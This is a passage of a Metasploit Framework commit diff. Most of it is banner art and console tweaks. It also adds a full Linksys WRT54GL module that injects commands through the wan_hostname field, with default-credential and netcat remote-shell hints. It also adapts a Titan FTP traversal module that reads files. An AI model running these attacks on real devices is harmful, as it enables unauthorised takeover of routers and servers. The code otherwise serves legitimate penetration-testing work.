| %bld[ OK ]%clr |
|______________________________________________________________________________|
| |
|______________________________________________________________________________|
%clr
',
'%clr
______________________________________________________________________________
| |
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr |
|______________________________________________________________________________|
%yel\%clr %yel/%clr %yel/%clr
%yel\%clr . %yel/%clr %yel/%clr x
%yel\%clr %yel/%clr %yel/%clr
%yel\%clr %yel/%clr + %yel/%clr
%yel\%clr + %yel/%clr %yel/%clr
* %yel/%clr %yel/%clr
%yel/%clr . %yel/%clr
X %yel/%clr %yel/%clr X
%yel/%clr %red###%clr
%yel/%clr %red# %bld%%clr%red #%clr
%yel/%clr %red###%clr
. %yel/%clr
. %yel/%clr . %red*%clr .
%yel/%clr
*
+ %red*%clr
%bld^%clr
#### __ __ __ ####### __ __ __ ####
#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ####
################################################################################
################################################################################
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
################################################################################
%clr
',
'
%clr%whi
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
%bld
Stack: 90909090990909090990909090
90909090990909090990909090
90909090.90909090.90909090
90909090.90909090.90909090
90909090.90909090.09090900
90909090.90909090.09090900
..........................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
ccccccccc.................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
.................ccccccccc
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
..........................
ffffffffffffffffffffffffff
ffffffff..................
ffffffffffffffffffffffffff
ffffffff..................
ffffffff..................
ffffffff..................
%clr
%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr
Aiee, Killing Interrupt handler
%redKernel panic: Attempted to kill the idle task!
In swapper task - not syncing
%clr
',
'
%clr
%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr
%bluMMMMMMMMMMM MMMMMMMMMM%clr
%bluMMMN$ vMMMM%clr
%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr
%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr
%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr
%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr
%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr
%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr
%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
%clr
',
'
%clr ######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
%red##%clr %red###%clr #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
%clr
',
%Q{
%whi+-------------------------------------------------------+
%whi| METASPLOIT by Rapid7 |
%whi+---------------------------+---------------------------+
%whi| %blu__________________ %whi| |
%whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======\[%red*** %whi|
%whi| %blu)%yel=%blu\\\ %whi| %grn| %whiEXPLOIT %grn\\ %whi|
%whi| %blu// \\\\ %whi| %grn|_____________\\_______ %whi|
%whi| %blu// \\\\ %whi| %grn|==\[%whimsf >%grn\]============\\ %whi|
%whi| %blu// \\\\ %whi| %grn|______________________\\ %whi|
%whi| %blu// %whiRECON %blu\\\\ %whi| %grn\\(@)(@)(@)(@)(@)(@)(@)/ %whi|
%whi| %blu// \\\\ %whi| %grn********************* %whi|
%whi+---------------------------+---------------------------+
%whi| o O o | %yel\\'\\/\\/\\/'/ %whi|
%whi| o O | %yel)%whi======%yel( %whi|
%whi| o | %yel.' %whiLOOT %yel'. %whi|
%whi| %red|^^^^^^^^^^^^^^\|l%red___ %whi| %yel/ %grn_||__ %yel\\ %whi|
%whi| %red| %whiPAYLOAD %red|%whi""\\%red___, %whi| %yel/ %grn(_||_ %yel\\ %whi|
%whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi|
%whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi|
%whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi|
%whi+---------------------------+---------------------------+%clr
%clr
},]
%w{
wake-up-neo.txt
cow-head.txt
r7-metasploit.txt
figlet.txt
i-heart-shells.txt
branded-longhorn.txt
cowsay.txt
3kom-superhack.txt
missile-command.txt
null-pointer-deref.txt
metasploit-shield.txt
ninja.txt
workflow.txt
}
#
# Returns a random metasploit logo.
#
def self.readfile(fname)
base = File.expand_path(File.dirname(__FILE__))
pathname = File.join(base, "logos", fname)
fdata = "<< Missing banner: #{fname} >>"
begin
raise ArgumentError unless File.readable?(pathname)
raise ArgumentError unless File.stat(pathname).size < 4096
fdata = File.open(pathname) {|f| f.read f.stat.size}
rescue SystemCallError, ArgumentError
nil
end
return fdata
end
def self.to_s
if ENV['GOCOW']
case rand(2)
case rand(3)
when 0
Logos[1]
self.readfile Logos[1]
when 1
Logos[5]
self.readfile Logos[5]
when 2
self.readfile Logos[6]
end
else
Logos[rand(Logos.length)]
self.readfile Logos[rand(Logos.length)]
end
end

32
lib/msf/ui/console/command_dispatcher/db.rb
View File

@ -205,6 +205,7 @@ class Db
mode = :search
delete_count = 0
rhosts = []
host_ranges = []
search_term = nil
@ -241,7 +242,6 @@ class Db
output = args.shift
when '-R','--rhosts'
set_rhosts = true
rhosts = []
when '-S', '--search'
search_term = /#{args.shift}/nmi
@ -280,11 +280,6 @@ class Db
range.each do |address|
host = framework.db.find_or_create_host(:host => address)
print_status("Time: #{host.created_at} Host: host=#{host.address}")
if set_rhosts
# only unique addresses
addr = (host.scope ? host.address + '%' + host.scope : host.address )
rhosts << addr unless rhosts.include?(addr)
end
end
end
return
@ -323,7 +318,7 @@ class Db
tbl << columns
if set_rhosts
addr = (host.scope ? host.address + '%' + host.scope : host.address )
rhosts << addr unless rhosts.include?(addr)
rhosts << addr
end
if mode == :delete
host.destroy
@ -344,9 +339,11 @@ class Db
# Finally, handle the case where the user wants the resulting list
# of hosts to go into RHOSTS.
set_rhosts_from_addrs(rhosts) if set_rhosts
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
print_status("Deleted #{delete_count} hosts") if delete_count > 0
}
##
##
end
def cmd_services_help
@ -368,6 +365,7 @@ class Db
host_ranges = []
port_ranges = []
rhosts = []
delete_count = 0
search_term = nil
@ -420,7 +418,6 @@ class Db
output_file = ::File.expand_path(output_file)
when '-R','--rhosts'
set_rhosts = true
rhosts = []
when '-S', '--search'
search_term = /#{args.shift}/nmi
@ -508,7 +505,7 @@ class Db
tbl << columns
if set_rhosts
addr = (host.scope ? host.address + '%' + host.scope : host.address )
rhosts << addr unless rhosts.include?(addr)
rhosts << addr
end
if (mode == :delete)
@ -529,7 +526,7 @@ class Db
# Finally, handle the case where the user wants the resulting list
# of hosts to go into RHOSTS.
set_rhosts_from_addrs(rhosts) if set_rhosts
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
print_status("Deleted #{delete_count} services") if delete_count > 0
}
@ -680,6 +677,7 @@ class Db
host_ranges = []
port_ranges = []
rhosts = []
svcs = []
search_term = nil
@ -733,7 +731,6 @@ class Db
end
when "-R"
set_rhosts = true
rhosts = []
when '-S', '--search'
search_term = /#{args.shift}/nmi
when "-u","--user"
@ -828,7 +825,7 @@ class Db
end
if set_rhosts
addr = (cred.service.host.scope ? cred.service.host.address + '%' + cred.service.host.scope : cred.service.host.address )
rhosts << addr unless rhosts.include?(addr)
rhosts << addr
end
creds_returned += 1
end
@ -842,7 +839,7 @@ class Db
print_status("Wrote services to #{output_file}")
end
set_rhosts_from_addrs(rhosts) if set_rhosts
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
print_status "Found #{creds_returned} credential#{creds_returned == 1 ? "" : "s"}."
}
end
@ -873,6 +870,7 @@ class Db
set_rhosts = false
host_ranges = []
rhosts = []
search_term = nil
while (arg = args.shift)
@ -896,7 +894,6 @@ class Db
types = typelist.strip().split(",")
when '-R','--rhosts'
set_rhosts = true
rhosts = []
when '-S', '--search'
search_term = /#{args.shift}/nmi
when '-h','--help'
@ -954,7 +951,7 @@ class Db
msg << " host=#{note.host.address}"
if set_rhosts
addr = (host.scope ? host.address + '%' + host.scope : host.address )
rhosts << addr unless rhosts.include?(addr)
rhosts << addr
end
end
if (note.service)
@ -971,7 +968,7 @@ class Db
# Finally, handle the case where the user wants the resulting list
# of hosts to go into RHOSTS.
set_rhosts_from_addrs(rhosts) if set_rhosts
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
print_status("Deleted #{delete_count} note#{delete_count == 1 ? "" : "s"}") if delete_count > 0
}
@ -1707,4 +1704,3 @@ end
end
end
end

19
lib/msf/ui/logos/3kom-superhack.txt Normal file
View File

@ -0,0 +1,19 @@
%clr
______________________________________________________________________________
| |
| %bld3Kom SuperHack II Logon%clr |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ %redsecurity%clr ] |
| |
| Password: [ ] |
| |
| |
| |
| %bld[ OK ]%clr |
|______________________________________________________________________________|
| |
| http://metasploit.pro |
|______________________________________________________________________________|%clr

9
lib/msf/ui/logos/branded-longhorn.txt Normal file
View File

@ -0,0 +1,9 @@
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||

16
lib/msf/ui/logos/cow-head.txt Normal file
View File

@ -0,0 +1,16 @@
%whi
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/%clr

8
lib/msf/ui/logos/cowsay.txt Normal file
View File

@ -0,0 +1,8 @@
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *

6
lib/msf/ui/logos/figlet.txt Normal file
View File

@ -0,0 +1,6 @@
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\

8
lib/msf/ui/logos/i-heart-shells.txt Normal file
View File

@ -0,0 +1,8 @@
%whiIIIIII %reddTb.dTb%clr _.---._
%whi II %red4' v 'B%clr .'"".'/|\`.""'.
%whi II %red6. .P%clr : .' / | \ `. :
%whi II %red'T;. .;P'%clr '.' / | \ `.'
%whi II %red'T; ;P'%clr `. / | \ .'
%whiIIIIII %red'YvP'%clr `-.__|__.-'
I love shells --egypt

21
lib/msf/ui/logos/metasploit-shield.txt Normal file
View File

@ -0,0 +1,21 @@
%clr
%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr
%bluMMMMMMMMMMM MMMMMMMMMM%clr
%bluMMMN$ vMMMM%clr
%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr
%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr
%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr
%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr
%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr
%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr
%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
%clr%bld http://metasploit.pro

30
lib/msf/ui/logos/missile-command.txt Normal file
View File

@ -0,0 +1,30 @@
%clr
______________________________________________________________________________
| |
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr |
|______________________________________________________________________________|
%yel\%clr %yel/%clr %yel/%clr
%yel\%clr . %yel/%clr %yel/%clr x
%yel\%clr %yel/%clr %yel/%clr
%yel\%clr %yel/%clr + %yel/%clr
%yel\%clr + %yel/%clr %yel/%clr
* %yel/%clr %yel/%clr
%yel/%clr . %yel/%clr
X %yel/%clr %yel/%clr X
%yel/%clr %red###%clr
%yel/%clr %red# %bld%%clr%red #%clr
%yel/%clr %red###%clr
. %yel/%clr
. %yel/%clr . %red*%clr .
%yel/%clr
*
+ %red*%clr
%bld^%clr
#### __ __ __ ####### __ __ __ ####
#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ####
################################################################################
################################################################################
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
################################################################################
http://metasploit.pro%clr

30
lib/msf/ui/logos/ninja.txt Normal file
View File

@ -0,0 +1,30 @@
%clr ######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
%red##%clr %red###%clr #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
http://metasploit.pro%clr

37
lib/msf/ui/logos/null-pointer-deref.txt Normal file
View File

@ -0,0 +1,37 @@
%clr%whi
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
%bld
Stack: 90909090990909090990909090
90909090990909090990909090
90909090.90909090.90909090
90909090.90909090.90909090
90909090.90909090.09090900
90909090.90909090.09090900
..........................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
ccccccccc.................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
.................ccccccccc
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
..........................
ffffffffffffffffffffffffff
ffffffff..................
ffffffffffffffffffffffffff
ffffffff..................
ffffffff..................
ffffffff..................
%clr
%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr
Aiee, Killing Interrupt handler
%redKernel panic: Attempted to kill the idle task!
In swapper task - not syncing%clr

16
lib/msf/ui/logos/r7-metasploit.txt Normal file
View File

@ -0,0 +1,16 @@
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.pro %%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

5
lib/msf/ui/logos/test.rb Normal file
View File

@ -0,0 +1,5 @@
here = File.expand_path(File.dirname(__FILE__))
puts "Hi I live #{here}!"

26
lib/msf/ui/logos/wake-up-neo.txt Normal file
View File

@ -0,0 +1,26 @@
%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
%bldthe matrix has you%clr
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
http://metasploit.pro%clr

21
lib/msf/ui/logos/workflow.txt Normal file
View File

@ -0,0 +1,21 @@
%whi+-------------------------------------------------------+
%whi| METASPLOIT by Rapid7 |
%whi+---------------------------+---------------------------+
%whi| %blu__________________ %whi| |
%whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======[%red*** %whi|
%whi| %blu)%yel=%blu\ %whi| %grn| %whiEXPLOIT %grn\ %whi|
%whi| %blu// \\ %whi| %grn|_____________\_______ %whi|
%whi| %blu// \\ %whi| %grn|==[%whimsf >%grn]============\ %whi|
%whi| %blu// \\ %whi| %grn|______________________\ %whi|
%whi| %blu// %whiRECON %blu\\ %whi| %grn\(@)(@)(@)(@)(@)(@)(@)/ %whi|
%whi| %blu// \\ %whi| %grn********************* %whi|
%whi+---------------------------+---------------------------+
%whi| o O o | %yel\'\/\/\/'/ %whi|
%whi| o O | %yel)%whi======%yel( %whi|
%whi| o | %yel.' %whiLOOT %yel'. %whi|
%whi| %red|^^^^^^^^^^^^^^|l%red___ %whi| %yel/ %grn_||__ %yel\ %whi|
%whi| %red| %whiPAYLOAD %red|%whi""\%red___, %whi| %yel/ %grn(_||_ %yel\ %whi|
%whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi|
%whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi|
%whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi|
%whi+---------------------------+---------------------------+%clr

10
lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
View File

@ -342,7 +342,15 @@ class Console::CommandDispatcher::Core
return
end
print_status("Migrating to #{pid}...")
begin
server = client.sys.process.open
rescue TimeoutError => e
elog(e.to_s)
rescue RequestError => e
elog(e.to_s)
end
server ? print_status("Migrating from #{server.pid} to #{pid}...") : print_status("Migrating to #{pid}")
# Do this thang.
client.core.migrate(pid)

2
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
View File

@ -129,7 +129,7 @@ class Console::CommandDispatcher::Stdapi::Ui
def cmd_screenshot( *args )
path = Rex::Text.rand_text_alpha(8) + ".jpeg"
quality = 50
view = true
view = false
screenshot_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner." ],

202
modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb Normal file
View File

@ -0,0 +1,202 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys WRT54GL Remote Command Execution',
'Description' => %q{
Some Linksys Routers are vulnerable to OS Command injection.
You will need credentials to the web interface to access the vulnerable part
of the application.
Default credentials are always a good starting point. admin/admin or admin
and blank password could be a first try.
Note: This is a blind os command injection vulnerability. This means that
you will not see any output of your command. Try a ping command to your
local system for a first test.
Hint: To get a remote shell you could upload a netcat binary and exec it.
WARNING: Backup your network and dhcp configuration. We will overwrite it!
Have phun
},
'Author' => [ 'm-1-k-3' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ],
[ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ],
[ 'EDB', '24202' ],
[ 'BID', '57459' ],
[ 'OSVDB', '89421' ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 18 2013'))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI',[ true, 'PATH to OS Command Injection', '/apply.cgi']),
OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
OptString.new('PASSWORD',[ false, 'Password to login with', 'password']),
OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']),
OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']),
OptAddress.new('LANIP', [ false, 'LAN IP address of the router - CHANGE THIS', '1.1.1.1']),
OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']),
OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']),
OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500'])
], self.class)
end
def run
#setting up some basic variables
uri = datastore['TARGETURI']
user = datastore['USERNAME']
rhost = datastore['RHOST']
netmask = datastore['NETMASK']
routername = datastore['ROUTER_NAME']
wandomain = datastore['WAN_DOMAIN']
wanmtu = datastore['WAN_MTU']
if datastore['LANIP'] !~ /1.1.1.1/
#there is a configuration from the user so we use LANIP for the router configuration
ip = datastore['LANIP'].split('.')
else
#no configuration from user so we use RHOST for the router configuration
ip = rhost.split('.')
end
if datastore['PASSWORD'].nil?
pass = ""
else
pass = datastore['PASSWORD']
end
print_status("Trying to login with #{user} / #{pass}")
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'basic_auth' => "#{user}:#{pass}"
})
unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("#{rhost} not responding")
return :abort
end
if (res.code == 404)
print_error("Not Found page returned")
return :abort
end
if [200, 301, 302].include?(res.code)
print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
else
print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'")
return :abort
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost} - Failed to connect to the web server")
return :abort
end
cmd = datastore['CMD']
print_status("Sending remote command: " + cmd)
#cmd = Rex::Text.uri_encode(datastore['CMD'])
#original Post Request:
#data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&"
#data_cmd << "lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&"
#data_cmd << "wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&"
#data_cmd << "lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&"
#data_cmd << "lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&"
#data_cmd << "wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&"
#data_cmd << "wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&"
#data_cmd << "wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1"
vprint_status("using the following target URL: #{uri}")
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'basic_auth' => "#{pass}:#{pass}",
#'data' => data_cmd,
'vars_post' => {
'submit_button' => "index",
'change_action' => "1",
'submit_type' => "1",
'action' => "Apply",
'now_proto' => "dhcp",
'daylight_time' => "1",
'lan_ipaddr' => "4",
'wait_time' => "0",
'need_reboot' => "0",
'ui_language' => "de",
'wan_proto' => "dhcp",
'router_name' => "#{routername}",
'wan_hostname' => "`#{cmd}`",
'wan_domain' => "#{wandomain}",
'mtu_enable' => "1",
'wan_mtu' => "#{wanmtu}",
'lan_ipaddr_0' => "#{ip[0]}",
'lan_ipaddr_1' => "#{ip[1]}",
'lan_ipaddr_2' => "#{ip[2]}",
'lan_ipaddr_3' => "#{ip[3]}",
'lan_netmask' => "#{netmask}",
'lan_proto' => "dhcp",
'dhcp_check' => "1",
'dhcp_start' => "100",
'dhcp_num' => "50",
'dhcp_lease' => "0",
'wan_dns' => "4",
'wan_dns0_0' => "0",
'wan_dns0_1' => "0",
'wan_dns0_2' => "0",
'wan_dns0_3' => "0",
'wan_dns1_0' => "0",
'wan_dns1_1' => "0",
'wan_dns1_2' => "0",
'wan_dns1_3' => "0",
'wan_dns2_0' => "0",
'wan_dns2_1' => "0",
'wan_dns2_2' => "0",
'wan_dns2_3' => "0",
'wan_wins' => "4",
'wan_wins_0' => "0",
'wan_wins_1' => "0",
'wan_wins_2' => "0",
'wan_wins_3' => "0",
'time_zone' => "-08+1+1",
'_daylight_time' => '1'
}
})
rescue ::Rex::ConnectionError
vprint_error("#{rhost} - Failed to connect to the web server")
return :abort
end
if res and res.code == 200
print_status("Blind Exploitation - Response expected")
else
print_error("Blind Exploitation - Response don't expected")
end
print_status("Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed")
print_status("Blind Exploitation - unknown Exploitation state")
end
end

13
modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb → modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb
View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def proto
'ftp'
@ -28,7 +29,11 @@ class Metasploit3 < Msf::Auxiliary
Although the daemon runs with SYSTEM privileges, access is limited to files
that reside on the same drive as the FTP server's root directory.
},
'Author' => 'jduck',
'Author' =>
[
'jduck',
'Brandon McCann @zeknox <bmccann[at]accuvant.com>',
],
'License' => MSF_LICENSE,
'References' =>
[
@ -47,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
def run_host(ip)
connect_login
@ -55,7 +60,8 @@ class Metasploit3 < Msf::Auxiliary
res = send_cmd( ['XCRC', path, "0", "9999999999"], true )
if not (res =~ /501 Syntax error in parameters or arguments\. EndPos of 9999999999 is larger than file size (.*)\./)
raise RuntimeError, "Unable to obtain file size! File probably doesn't exist."
print_error("Unable to obtain file size! File probably doesn't exist.")
return
end
file_size = $1.to_i
@ -94,6 +100,7 @@ class Metasploit3 < Msf::Auxiliary
fname = datastore['PATH'].gsub(/[\/\\]/, '_')
p = store_loot("titanftp.traversal", "text/plain", "rhost", file_data, fname)
print_status("Saved in: #{p}")
vprint_status(file_data.inspect)
